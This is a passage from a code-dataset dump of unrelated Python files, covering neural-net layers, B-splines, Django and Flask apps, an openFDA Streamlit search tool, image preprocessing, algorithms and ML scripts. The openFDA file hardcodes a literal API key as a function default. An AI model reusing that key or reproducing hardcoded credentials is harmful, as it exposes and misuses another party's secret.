torch.nn.BatchNorm2d,\n act_fn: torch.nn.Module = torch.nn.PReLU,\n dropout_fn: torch.nn.Module = torch.nn.Dropout,\n dropout_param: float = 0.0,\n ):\n super().__init__()\n self.ordering = ordering\n self.norm_fn = norm_fn\n self.act_fn = act_fn\n self.dropout_fn = dropout_fn\n self.dropout_param = dropout_param\n\n self.name_dict = {\n \"A\": \"activation\",\n \"D\": \"dropout\",\n \"N\": \"normalization\",\n }\n\n def __call__(self, in_channels: int):\n return ActDropNorm(\n in_channels=in_channels,\n ordering=self.ordering,\n norm_fn=self.norm_fn,\n act_fn=self.act_fn,\n dropout_fn=self.dropout_fn,\n dropout_param=self.dropout_param,\n )\n","repo_name":"CCIG-Champalimaud/adell-mri","sub_path":"lib/modules/layers/adn_fn.py","file_name":"adn_fn.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"71189400693","text":"import scipy.interpolate\nimport numpy\nimport matplotlib.pyplot as plt\n\nclass BSpline:\n\n @staticmethod\n def getDefaultKnots():\n return [0, 50, 100, 200, 400, 800, 1600, 3200, 6400, 12800, 25600, 48000]\n\n def getNumBases(self):\n return self.numBases\n\n def getBasis(self, i):\n return self.bases[i]\n\n def __init__(self, grid, knots, degree = 3):\n self.degree = degree\n self.knots = list(knots)\n for i in range(degree):\n self.knots.insert(0, self.knots[0])\n self.knots.append(self.knots[-1])\n self.numBases = len(self.knots)-degree-1\n self.bases = []\n for i in range(self.numBases):\n weights = [1 if i == j else 0 for j in range(self.numBases)]\n b1 = scipy.interpolate.BSpline(self.knots, weights, degree, extrapolate=False)\n x = numpy.linspace(self.knots[i], self.knots[i + degree + 1], 100)\n self.bases.append([b1(x) if x <= self.knots[i+degree+1] and x >= self.knots[i] else 0 for x in grid])\n\n\nif __name__ == '__main__':\n degree = 3\n maxFreq = 48000\n grid = numpy.linspace(0, 48000, 1000)\n bspline = BSpline(grid, BSpline.getDefaultKnots(), 3)\n for i in range(bspline.getNumBases()):\n plt.plot(grid, bspline.getBasis(i))\n plt.show()\n","repo_name":"gradyschofield/digital-filters","sub_path":"BSpline.py","file_name":"BSpline.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3831545021","text":"\"\"\"schoolpro URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\n\nfrom user.views import index, index_home \nfrom siteinfo.views import site_overview\nfrom attendance.views import rollcall\n\nurlpatterns = [\n url(r'^$', index, name='index'),\n url(r'^home/$', index_home, name='index_home'),\n\n url(r'^management/$', site_overview, name='overview'),\n url(r'^rollcall/$', rollcall, name='rollcall'),\n\n url(r'^attendance/', include('attendance.urls', namespace=\"attendance\")),\n url(r'^booking/', include('booking.urls', namespace=\"booking\")),\n url(r'^classroom/', include('classroom.urls', namespace=\"classroom\")),\n url(r'^facilities/', include('facilities.urls', namespace=\"facilities\")),\n url(r'^inbox/', include('inbox.urls', namespace=\"inbox\")),\n url(r'^report/', include('report.urls', namespace=\"report\")),\n url(r'^siteinfo/', include('siteinfo.urls', namespace=\"siteinfo\")),\n url(r'^timetable/', include('timetable.urls', namespace=\"timetable\")),\n url(r'^user/', include('user.urls', namespace=\"user\")),\n\n url(r'^admin/', admin.site.urls),\n]\n","repo_name":"AndyUT101/myproject","sub_path":"schoolpro/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13250208714","text":"# run.py\n\nimport os\nfrom os import environ\nfrom myApp import create_app\nfrom flask import render_template\nfrom flask import request\n\n\nos.environ[\"FLASK_CONFIG\"] = \"sandbox\"\n#os.environ[\"FLASK_APP\"] = \"runserver.py\"\nconfig_name = os.getenv('FLASK_CONFIG')\nprint('@@@@ENV@@@',config_name)\n\n# Example configuration\n#ENVIRONMENT_DEBUG = os.environ.get(\"DEBUG\", default=False)\n#if ENVIRONMENT_DEBUG.lower() in (\"f\", \"false\"):\n# ENVIRONMENT_DEBUG = False\n#DEBUG = ENVIRONMENT_DEBUG\n#SECRET_KEY = os.environ.get(\"SECRET_KEY\", default=None)\n#if not SECRET_KEY:\n# raise ValueError(\"No secret key set for Flask application\")\n\n#config_name = 'sandbox'\napp = create_app(config_name)\n\n###############################################\n@app.errorhandler(404)\ndef page_not_found(e):\n varPageName1 = str(request._get_current_object())\n return render_template('404.html'), 404\n###############################################\n\nif __name__ == '__main__':\n HOST = environ.get('SERVER_HOST', 'localhost')\n try:\n PORT = int(environ.get('SERVER_PORT', '5555'))\n except ValueError:\n PORT = 5555\n\n app.run(HOST, PORT)","repo_name":"ganimidesifestionas/ganimedes_alpha","sub_path":"ganimedes/runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24109695761","text":"import streamlit as st\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport subprocess\nimport openFDA_parser\nimport sys\nimport json\nimport math\nimport requests\n\ndef fetch_fda_data(query, database='event', count=False, field_count='', limit=1000, api_key='WuFW3nIY42Jq1SR9STTbDlQOfYNORGfeHsk5FFU9'):\n base_url = f'https://api.fda.gov/device/{database}.json?api_key={api_key}&search='\n\n try:\n if count:\n url = f'{base_url}{query}&count={field_count}'\n else:\n meta_url = f'{base_url}{query}'\n json_re = requests.get(meta_url).json()\n number_results = json_re['meta']['results']['total']\n\n if number_results == 0:\n st.warning(\"The search query returned 0 results. Please try a different query.\")\n return None, None, None, 0 # Return zero results\n\n urls = [f'{base_url}{query}&limit={limit}&skip={1000 * i}' for i in range(math.ceil(number_results / 1000))] if number_results > 1000 else [f'{base_url}{query}&limit={limit}&skip=0']\n\n data = []\n for url in urls:\n response = requests.get(url)\n response.raise_for_status() # Raise an error for non-OK responses\n unique_json = json.loads(response.text)['results']\n data.extend(unique_json)\n\n with open('openFDA_raw_data.json', 'w') as f:\n json.dump(data, f, indent=5)\n\n last_updated = json_re['meta']['last_updated']\n n_results = number_results\n\n return data, database, last_updated, n_results\n\n except requests.exceptions.RequestException as e:\n st.error(f\"Error: {str(e)}\")\n return None, None, None, str(e) # Return the error message as a string\n except KeyError:\n st.error(\"Error: Unexpected response format from openFDA API.Please try other keywords\")\n return None, None, None, \"None\"\n\ndef search_data(query, database, from_date, to_date):\n data, database, last_updated, n_results = fetch_fda_data(query=query, database=database)\n \n parser_functions = {\n 'event': openFDA_parser.parser_event,\n '510k': openFDA_parser.parser_510k,\n 'udi': openFDA_parser.parser_udi,\n 'recall': openFDA_parser.parser_recalls\n }\n \n df = pd.DataFrame(parser_functions.get(database, lambda data: [])(data))\n \n return df, database, last_updated, n_results\n\n# Set Streamlit app title and layout\nst.set_page_config(layout=\"wide\")\ncol1, col2, col3 = st.columns([2, 2, 1])\nst.title('Search openFDA Database')\nst.sidebar.title('Settings')\n\n# Initialize session state\nif 'df' not in st.session_state:\n st.session_state.df = None\n\nif 'plot_container' not in st.session_state:\n st.session_state.plot_container = None\n\n# Add query input\nquery = st.sidebar.text_input('Query', '')\nif not query:\n st.warning('Please enter a query.')\n st.stop()\n\n# Add database selection\ndatabase = st.sidebar.selectbox('Database', ['event', '510k', 'udi', 'recall'])\n\n# Add date range selection\nfrom_date = st.sidebar.date_input('From Date (YYYY-MM-DD)', datetime.today() - timedelta(days=365.25 * 5))\nto_date = st.sidebar.date_input('To Date (YYYY-MM-DD)', datetime.today())\n\n# Add search button\nsearch_button = st.sidebar.button('Search')\n\nif search_button:\n # If date range is specified, add it to the search query\n if from_date and to_date:\n date_filter = f'+AND+[{from_date.strftime(\"%Y-%m-%d\")}+TO+{to_date.strftime(\"%Y-%m-%d\")}]'\n query += date_filter\n\n df, saved_database, last_updated, n_results = search_data(query, database, from_date, to_date)\n\n csv_path = f'saved_csv/{database}_data.csv'\n\n try:\n df.to_csv(csv_path, sep='|', encoding='UTF-8')\n except Exception as e:\n st.error(f\"Error saving CSV file: {str(e)}\")\n st.stop() # Stop execution if there's an error\n\n col1.success(f\"Search for openFDA in {saved_database} database is completed.\")\n\n col3.metric(label=\"Number of Results\", value=n_results)\n col3.metric(label=\"Last Updated\", value=last_updated)\n\n col2.download_button(label=\"Download CSV\", data=df.to_csv(index=False), key='download_csv', file_name=f'{database}_data.csv', mime='text/csv')\n\n # Store the DataFrame in session state\n st.session_state.df = df\n\n# Function to execute event_plot.py\ndef execute_event_plot():\n virtualenv_python = sys.executable # Get the path to the currently running Python executable\n script_path = \"Misc/event_plot.py\"\n subprocess.run([virtualenv_python, script_path])\n\n# Create a button to execute the script if the selected database is \"event\"\nif database == 'event' and st.button(\"Execute event_plot.py\"):\n execute_event_plot()\n st.success(\"event_plot.py executed successfully!\")\n\n# Display the main window\nst.sidebar.write(\"[Go back to Search Page](#settings)\")\n","repo_name":"KhalilAMARDJIA/open_FDA","sub_path":"GUI_search.py","file_name":"GUI_search.py","file_ext":"py","file_size_in_byte":4878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28278092860","text":"from common.caching import read_input_dir, cached\nfrom common.dataio import get_aps_data_hdf5, get_passenger_clusters\n\nimport numpy as np\nimport skimage.transform\nimport glob\nimport os\nimport tqdm\nimport h5py\nimport pickle\nimport imageio\nimport skimage.measure\nimport cv2\n\n\nSEGMENTATION_COLORS = np.array([[255, 0, 0], [255, 0, 255], [0, 0, 255]])\n\n\ndef _get_mask(image, color):\n mask = np.all(image[..., :3] == color, axis=-1)\n mask = np.stack(np.split(mask, 16, axis=1), axis=-1)\n return mask\n\n\n@cached(get_aps_data_hdf5, version=2, subdir='ssd')\ndef get_threat_heatmaps(mode):\n if not os.path.exists('done'):\n names, labels, x = get_aps_data_hdf5(mode)\n f = h5py.File('data.hdf5', 'w')\n th = f.create_dataset('th', x.shape + (3,))\n\n with read_input_dir('hand_labeling/threat_segmentation/base'):\n for i, (name, label, data) in tqdm.tqdm(enumerate(zip(names, labels, x)), total=len(x)):\n files = glob.glob(name + '*')\n assert files, 'missing hand segmentation for %s' % name\n\n image = imageio.imread(files[0])\n masks = [_get_mask(image, SEGMENTATION_COLORS[ci]) for ci in range(3)]\n with read_input_dir('hand_labeling/threat_segmentation/revision_v0'):\n for revision in glob.glob(name + '*'):\n rlabel = int(revision.split('_')[1].split('.')[0])\n rci = [i+1 for i in range(17) if label[i]].index(rlabel)\n rimage = imageio.imread(revision)\n masks[rci] = _get_mask(rimage, SEGMENTATION_COLORS[0])\n\n th[i] = np.stack(masks, axis=-1)\n\n open('done', 'w').close()\n else:\n f = h5py.File('data.hdf5', 'r')\n th = f['th']\n return th\n\n\n@cached(get_threat_heatmaps, version=8, subdir='ssd', cloud_cache=True)\ndef get_augmented_threat_heatmaps(mode):\n if not os.path.exists('done'):\n th_in = get_threat_heatmaps(mode)\n f = h5py.File('data.hdf5', 'w')\n th = f.create_dataset('th', (len(th_in), 16, 660, 512, 6))\n\n def segmentation_mask(masks):\n ret = np.zeros((16, 660, 512, 2))\n for i in range(16):\n for j in range(3):\n cur = masks[..., i, j]\n if not cur.any():\n continue\n ret[i, ..., 0] += cur / np.max(cur)\n ret[i, ..., 1] += cur / np.sum(cur)\n return ret\n\n def com_mask(masks):\n ret = np.zeros((16, 660, 512, 2))\n for i in range(16):\n for j in range(3):\n cur = masks[..., i, j]\n if not cur.any():\n continue\n M = skimage.measure.moments(cur.astype('double'))\n xb, yb = M[0, 1]/M[0, 0], M[1, 0]/M[0, 0]\n cov = np.array([[16, 0], [0, 16]])\n covinv = np.linalg.inv(cov)\n mean = np.array([xb, yb])\n gx, gy = np.meshgrid(np.arange(512), np.arange(660))\n g = np.reshape(np.stack([gy, gx], axis=-1), (-1, 2))\n g = np.exp(-0.5*np.sum((g-mean).dot(covinv)*(g-mean), axis=1))\n g = np.reshape(g, (660, 512))\n ret[i, ..., 0] += g / np.max(g)\n ret[i, ..., 1] += g / np.sum(g)\n return ret\n\n def distance_mask(masks):\n ret = np.zeros((16, 660, 512, 2))\n for i in range(16):\n for j in range(3):\n cur = (masks[..., i, j]*255).astype('uint8')\n if not cur.any():\n continue\n g = cv2.distanceTransform(cur, cv2.DIST_L2, cv2.DIST_MASK_PRECISE)\n ret[i, ..., 0] += g / np.max(g)\n ret[i, ..., 1] += g / np.sum(g)\n return ret\n\n mean = np.zeros(6)\n for i, data in enumerate(tqdm.tqdm(th_in)):\n th[i, ..., 0:2] = segmentation_mask(data)\n th[i, ..., 2:4] = com_mask(data)\n th[i, ..., 4:6] = distance_mask(data)\n mean += np.mean(th[i], axis=(0, 1, 2)) / len(th)\n\n np.save('mean.npy', mean)\n f.close()\n open('done', 'w').close()\n\n f = h5py.File('data.hdf5', 'r')\n th = f['th']\n mean = np.load('mean.npy')\n return th, mean\n\n\n@cached(get_aps_data_hdf5, get_threat_heatmaps, version=0, subdir='ssd')\ndef get_data_and_threat_heatmaps(mode):\n names, labels, x = get_aps_data_hdf5(mode)\n if not os.path.exists('done'):\n th = get_threat_heatmaps(mode)\n f = h5py.File('data.hdf5', 'w')\n dset = f.create_dataset('dset', x.shape + (4,))\n for i, (data, hmap) in tqdm.tqdm(enumerate(zip(x, th)), total=len(x)):\n dset[i] = np.concatenate([data[..., np.newaxis], hmap], axis=-1)\n open('done', 'w').close()\n else:\n f = h5py.File('data.hdf5', 'r')\n dset = f['dset']\n return names, labels, dset\n\n\n@cached(get_data_and_threat_heatmaps, version=0)\ndef sanity_check_threat_heatmaps(mode):\n names, labels, dset = get_data_and_threat_heatmaps(mode)\n for name, label, data in tqdm.tqdm(zip(names, labels, dset), total=len(dset)):\n th = data[..., 1:]\n has_t = np.any(th, axis=(0, 1, 2))\n if np.sum(has_t) != sum(label):\n print('heatmaps from %s does not match label' % name)\n","repo_name":"suchir/passenger_screening_algorithm_challenge","sub_path":"model_v2/dataio.py","file_name":"dataio.py","file_ext":"py","file_size_in_byte":5466,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"8133384861","text":"from flask import Flask, render_template, url_for, flash, redirect, request, Blueprint, flash, session, jsonify, current_app\nfrom forms import UploadPDFForm\nfrom flask_sqlalchemy import SQLAlchemy\nfrom pdfminer.high_level import extract_text\nimport threading, queue, json, time, os, secrets, re\n\n\n\ndb = SQLAlchemy()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config['SECRET_KEY'] = os.environ.get(\"SECRET_KEY\")\n # app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n # db = SQLAlchemy(app)\n db.init_app(app)\n return app\n\n\napp = create_app()\n\n\nglobal raw_text\nraw_text = []\nglobal split_text\nsplit_text = []\nglobal firstCut\nfirstCut = []\nglobal secondCut\nsecondCut = []\nglobal thirdCutList\nthirdCutList = []\nglobal data\ndata = []\nglobal dataSession\ndataSession = \"\"\n\n\ndef save_pdf(pdf_form):\n f_name, f_ext = os.path.splitext(pdf_form.filename)\n pdf_fn = f_name + f_ext\n # underneath line is for local version\n # pdf_path = os.path.join(app.root_path, 'static/user_pdf', pdf_fn)\n pdf_path = os.path.join(app.root_path, 'tmp')\n pdf_form.save(pdf_path)\n\n return pdf_path\n\n\ndef tittle_of_book(pdf_form):\n parts = []\n f_name, f_ext = os.path.splitext(pdf_form.filename)\n pdf_fn = f_name + f_ext\n ready_tittle = pdf_fn[:-4]\n ready_tittle_pretty_cut = ready_tittle.replace(\"_\", \" \")\n pretty_tittle = ready_tittle_pretty_cut.replace(\" \", \" \")\n return pretty_tittle\n\n\ndef convert_pdf_to_txt(path):\n text = extract_text(path)\n raw_text.append(text)\n\n\ndef split(lista):\n for i in lista:\n split = i.split(\" \")\n split_text.append(split)\n\n\ndef first_text_clean(lista):\n for i in lista[0]:\n if \"\\n\" in i:\n cut = i.replace('\\n', ' ')\n firstCut.append(cut)\n elif i == \"\\n\":\n continue\n else:\n firstCut.append(i)\n\n\ndef second_text_clean(lista):\n for i in lista:\n if re.search(r\"(\\s)\", i, re.I):\n cut = re.split(r\"(\\s)\", i)\n for j in cut:\n secondCut.append(j)\n else:\n secondCut.append(i)\n\n\ndef third_text_clean(lista):\n for i in lista:\n if re.match(r\"(\\s)\", i):\n continue\n elif i == '':\n continue\n else:\n thirdCutList.append(i)\n\n\ndef clearLists():\n global raw_text\n raw_text = []\n global split_text\n split_text = []\n global firstCut\n firstCut = []\n global secondCut\n secondCut = []\n global thirdCutList\n thirdCutList = []\n global data\n data = []\n global dataSession\n dataSession = []\n print(\"Lists cleared\")\n print(dataSession)\n\n\n@app.route('/', methods=['GET', 'POST', 'PUT'])\n@app.route('/home', methods=['GET', 'POST','PUT'])\ndef home():\n # Poniższa funkcja oczyszcza listy przed załadowaniem do nich nowego tekstu\n clearLists()\n print(\"home url is: \" + request.url)\n\n form = UploadPDFForm()\n if form.validate_on_submit():\n if form.pdfFile.data:\n pdf_file = save_pdf(form.pdfFile.data)\n bookTittle = tittle_of_book(form.pdfFile.data)\n session['my_var'] = pdf_file\n session['bookTittle'] = bookTittle\n \n return redirect(url_for('loadingPage'))\n \n\n return render_template('home.html', title='Upload page', form=form)\n\n\n\n@app.route('/about', methods=['GET', 'POST', 'PUT'])\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route('/loadReader', methods=['GET', 'POST', 'PUT'])\ndef loadReader():\n bookTittle = \"\"\n data = []\n return render_template('loadReader.html', title='Web_Reader', data=json.dumps(data), bookTitle = json.dumps(bookTittle))\n\n\n@app.route('/status')\ndef thread_status():\n \"\"\" Return the status of the worker thread \"\"\"\n global dataSession\n return jsonify(dict(status=('finished' if len(dataSession) > 1 else 'running')))\n\n\n# Queue to handle threads\nglobal q\nq = queue.Queue()\n\n\n@app.route('/loadingPage', methods=['GET', 'POST', 'PUT'])\ndef loadingPage():\n my_var = session.get('my_var', None)\n bookTittle = session.get('bookTittle', None)\n global q\n \n def fillLists():\n \n # 3rd try that does work localy but doesnt work on heroku\n with app.test_request_context():\n print(request.url)\n print(threading.enumerate())\n threading.currentThread().setName(bookTittle) \n newThread = threading.currentThread().getName()\n q.put(newThread)\n # q.queue tworzy deque object (kopie q) z możliwością podglądania q\n deque = q.queue\n print(\"backgroundRun started\")\n print(\"Ilość działających threadów to: \" + str(threading.active_count()))\n print(\"\")\n print(threading.currentThread().getName())\n print(q.qsize())\n print(\"Last elem in q is: \" + deque[-1])\n print(deque)\n convert_pdf_to_txt(my_var)\n print(threading.currentThread().getName() + \" converting pdf done\")\n if q.empty():\n os.remove(my_var)\n print(\"Q empty, elem does nothing\")\n return\n if threading.currentThread().getName() != deque[-1]:\n global raw_text\n raw_text = []\n os.remove(my_var)\n print(\"raw_text cleared\")\n print(threading.currentThread().getName())\n print(\"Last elem in q is: \" + deque[-1])\n print(deque)\n return\n if threading.currentThread().getName() == deque[-1] and split_text != []:\n print(threading.currentThread().getName() + \" thread finished without action\")\n os.remove(my_var)\n return\n if threading.currentThread().getName() == deque[-1]:\n print(request.url)\n if request.url == \"https://fastpdfreader.herokuapp.com\":\n print(threading.currentThread().getName() + \" finished working and did nothing\")\n os.remove(my_var)\n return\n else:\n split(raw_text)\n first_text_clean(split_text)\n second_text_clean(firstCut)\n third_text_clean(secondCut)\n global dataSession\n dataSession = thirdCutList\n os.remove(my_var)\n print(threading.currentThread().getName() + \" run at finish line\")\n with q.mutex:\n q.queue.clear()\n print(deque)\n \n return\n\n \n backgroundRun = threading.Thread(target=fillLists)\n backgroundRun.deamon = True\n backgroundRun.start()\n \n\n return render_template('loadingPage.html', title='Loading')\n\n\n@app.route('/reader', methods=['GET', 'POST', 'PUT'])\ndef reader():\n global dataSession\n bookTittle = session.get('bookTittle', None)\n flash('Your file is uploaded. Have a nice read.', \"success\")\n\n return render_template('reader.html', title='Web Reader', data=json.dumps(dataSession), bookTitle = json.dumps(bookTittle))\n\n\n#command to check how many free dyno hours i have left:\n# heroku ps -a fastpdfreader \n\n\n# if __name__ == \"__main__\":\n# app.run(debug=True)\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"WKR92/FastPDFReaderOnline","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17516844530","text":"# 출력 출발 노드에서 최소 몇 개 간선을 지나면 도착 노드에 갈 수 있는지\n# 입력을 그래피로 정리\n# bfs 로 도착 노드 찾기\n\nimport sys\nfrom pprint import pprint\nsys.stdin = open('input.txt')\n\ndef bfs():\n visited = [0] * (V+1)\n Q = []\n Q.append(S)\n visited[S] = 1\n while Q:\n node = Q.pop(0)\n for i in range(V+1):\n if graph[node][i] == 1 and visited[i] == 0:\n visited[i] = visited[node] + 1\n Q.append(i)\n if visited[G]:\n return visited[G] - 1\n else:\n return 0\n\nT = int(input())\n\nfor tc in range(1, T + 1):\n V, E = map(int, input().split())\n arr = [list(map(int, input().split())) for _ in range(E)]\n S, G = map(int, input().split())\n graph = [[0]*(V+1) for _ in range(V+1)]\n for edge in arr:\n graph[edge[0]][edge[1]] = 1\n graph[edge[1]][edge[0]] = 1\n\n rlt = bfs()\n print(f'#{tc} {rlt}')","repo_name":"Sangtaek-Lee/Algorithm","sub_path":"problem/0328평가대비/5102_node_distance_bfs/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14482086057","text":"# import package\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import GridSearchCV , KFold\r\nfrom sklearn.svm import SVR\r\n\r\n# read train data and test data\r\ndf=pd.read_csv(\"training_data.csv\")\r\ndf_test=pd.read_csv(\"test_data.csv\")\r\n\r\n#make text become array\r\ntext=df.text.values\r\nnew_text=df_test.text.values\r\ny=df.stars.values\r\n\r\n#Let the review_id , business_id and user_id become 0~1\r\nid_train=(df.iloc[:,:3]-df.iloc[:,:3].min())/(df.iloc[:,:3].max()-df.iloc[:,:3].min())\r\nid_test=(df_test.iloc[:,:3]-df_test.iloc[:,:3].min())/(df_test.iloc[:,:3].max()-df_test.iloc[:,:3].min())\r\n\r\n#use the tfidfvectorizer package and encode the text\r\nvectorizer=TfidfVectorizer(max_df=0.8,min_df=3).fit(text)\r\ntext=vectorizer.transform(text)\r\nfea=vectorizer.transform(new_text)\r\n\r\n#Let the correcting id and encoding text become array from\r\ntextid=pd.DataFrame(id_train)\r\ntextname=pd.DataFrame(text.toarray())\r\ntext=pd.concat([textid,textname],axis=1)\r\ntext=text.values\r\nnewid,newname=pd.DataFrame(id_test),pd.DataFrame(fea.toarray())\r\nfea=pd.concat([newid,newname],axis=1)\r\nfea=fea.values\r\n\r\n#Select the best parameters of the module SVM\r\nparam_grid={\"C\":[0.1,1,10],\"gamma\":[0.1,1,10]}\r\ncv=KFold(shuffle=True)\r\ngrid=GridSearchCV(SVR(),param_grid=param_grid,cv=cv,verbose=3)\r\n\r\n#Let the GridSearchCV fit the text and predict the stars\r\ngrid.fit(text,y)\r\npred=grid.predict(fea)\r\n\r\n#Decide the stars num >5 and <1 become 5 and 1\r\nfor i in range(len(pred)):\r\n\tif pred[i]>5 :\r\n\t\tpred[i]=5\r\n\telif pred[i]<1 :\r\n\t\tpred[i]=1\r\n\r\n#Write the predict data into csv\r\ncs=pd.DataFrame({\"aa\":df_test.iloc[:,0],'bb':pred})\r\ncs.to_csv(\"pred.csv\",index=False,header=False)\r\n\r\n\r\n","repo_name":"h24054043/Rating-Prediction-with-User-Business-Review","sub_path":"cp2.py","file_name":"cp2.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11821974737","text":"# Perguntar Salário de um funcionário\n# calcular valor do aumento\n# Salários superiores a R$1250 calcular aumento de 10%\n# para inferiores ou iguais aumento de 15%\n\nsal = float(input('Digite seu salário:').strip())\nif sal > 1250:\n print('Seu novo salário será: R${:.2f}'.format((sal*0.10)+sal))\nelse:\n print('Seu novo salário será:R${:.2f}'.format((sal*0.15)+sal))","repo_name":"Filipe-Amorim1/Scripts-Python","sub_path":"Aula09/Desafio34aula10salario.py","file_name":"Desafio34aula10salario.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1494642317","text":"class Comment:\n def __init__(self, username, content, likes=0):\n self.username = username\n self.content = content\n self.likes = likes\n\n\ncomment = Comment('user1', 'This is comment', 12)\nprint(comment.username)\nprint(comment.content)\nprint(comment.likes)","repo_name":"crbonev/py-fund","sub_path":"05_objects_and_classes/Lab/01_comment.py","file_name":"01_comment.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3625802979","text":"import pandas as pd\nimport numpy as np\nfrom pandas.tseries.offsets import DateOffset\nimport scipy\nimport matplotlib.pyplot as plt\nDPath='/Users/harbes/PycharmProjects/data/CNRDS/' #'E:/data/CNRDS/' #\nindicators_all=pd.read_pickle(DPath+'indicators_all').replace([np.inf, -np.inf], np.nan)\nPV=pd.read_pickle(DPath+'PV');PV.tail(10)\ntmp=PV[['Scode','Trddt','Adclsprc']].iloc[1:].set_index(['Trddt','Scode'])\ntmp=tmp.astype(float)\nadjprc=tmp.loc[~tmp.index.duplicated(keep='last')].unstack() # 提出duplicates\nadjprc.index=pd.to_datetime(adjprc.index,format='%Y-%m-%d')# 调整index格式\nadjprc.columns=adjprc.columns.get_level_values(1)# 调整columns格式\nGroupBy1=lambda x:x.year*100.0+x.month\n#p0=adjprc.groupby(by=GroupBy).first();p0\nret=adjprc.groupby(by=GroupBy1).last().pct_change();\nret.index=pd.to_datetime(ret.index.astype(int).astype(str),format='%Y%m')\n\n# 标准化indicators\nindicators_all.index.names=['Trddt','Scode']\ndel_col=['CP', 'CTA', 'EY', 'ROIC', 'SC'] # 出现大量的nan,影响估计\nindicators_all=indicators_all[indicators_all.columns.difference(del_col)]\nindi_standardized=indicators_all.groupby(by=['Trddt']).apply(lambda x:(x-x.mean())/x.std())\nret[ret==0]=np.nan\nret1=ret.stack().reindex(indi_standardized.index)\nret1.index.names=['Trddt','Scode']\ntime_set=set(indi_standardized.index.get_level_values(0)) # 日期集合\nindi_set=indi_standardized.columns # 指标集合\n\nM_hat=pd.DataFrame(0.0,index=pd.MultiIndex.from_product([time_set,indi_set]),columns=indi_set).sort_index() # 用于储存每个时间的M_hat矩阵\nslice_labels_matrix=pd.DataFrame(np.nan,index=time_set,columns=ret.columns).sort_index() # 用于储存股票在不同时间的分组/切片\nslice_num=20\nqcut_q=np.arange(slice_num+1)/slice_num\nqcut_labels=range(1,slice_num+1) # labels总比q的长度小1\nX_j_bar=pd.DataFrame(np.nan,index=pd.MultiIndex.from_product([time_set,qcut_labels]),columns=indi_set).sort_index() # 用于记录每个切片的characteristics的均值\nfor t in slice_labels_matrix.index:\n #对target进行slice\n slice_labels_matrix.loc[t]=pd.qcut(ret.loc[t],q=qcut_q,labels=qcut_labels)\n N = slice_labels_matrix.loc[t].count()\n for i in qcut_labels:\n X_j_bar.loc[(t,i)]=indi_standardized.loc[(t,slice(None))].loc[slice_labels_matrix.loc[t]==i].mean()#.fillna(0.0) # 存在不少的nan,删除指标?\n M_hat.loc[(t, slice(None)), :] +=np.kron(X_j_bar.loc[(t,i)],X_j_bar.loc[(t,i)]).reshape(indi_set.size,indi_set.size)\\\n *indi_standardized.loc[(t,slice(None))].loc[slice_labels_matrix.loc[t]==i].shape[0]/N\n\nfor t in slice_labels_matrix.index:\n indi_standardized.loc[t].fillna(0.0).T@indi_standardized.loc[t].fillna(0)\n a,b=np.linalg.eigh(indi_standardized.loc[t].cov())\n tmp=np.zeros((indi_set.size,indi_set.size))\n\n\n for i in indi_standardized.loc[t].index:\n tmp+=np.kron(indi_standardized.loc[(t,i)].fillna(0.0),indi_standardized.loc[(t,i)].fillna(0.0)).reshape(indi_set.size,indi_set.size)\n tmp/=indi_standardized.loc[t].index.size;tmp\n eig_vals, _ = np.linalg.eigh(tmp);eig_vals#.cumsum() / eig_vals.sum()\n np.linalg.det(tmp)\nM_hat.loc[t]\nX_j_bar.loc[t].cov()\n\neig_vals,_=np.linalg.eigh(X_j_bar.loc[t].cov());eig_vals.cumsum()/eig_vals.sum()\neig_vals,_=np.linalg.eigh(M_hat.loc[t]);eig_vals.cumsum()/eig_vals.sum()\n\neig_vals,_=np.linalg.eigh(indi_standardized.loc[(t,slice(None))].iloc[:,list(range(17))+list(range(18,20))].cov());eig_vals.cumprod() # 剔除 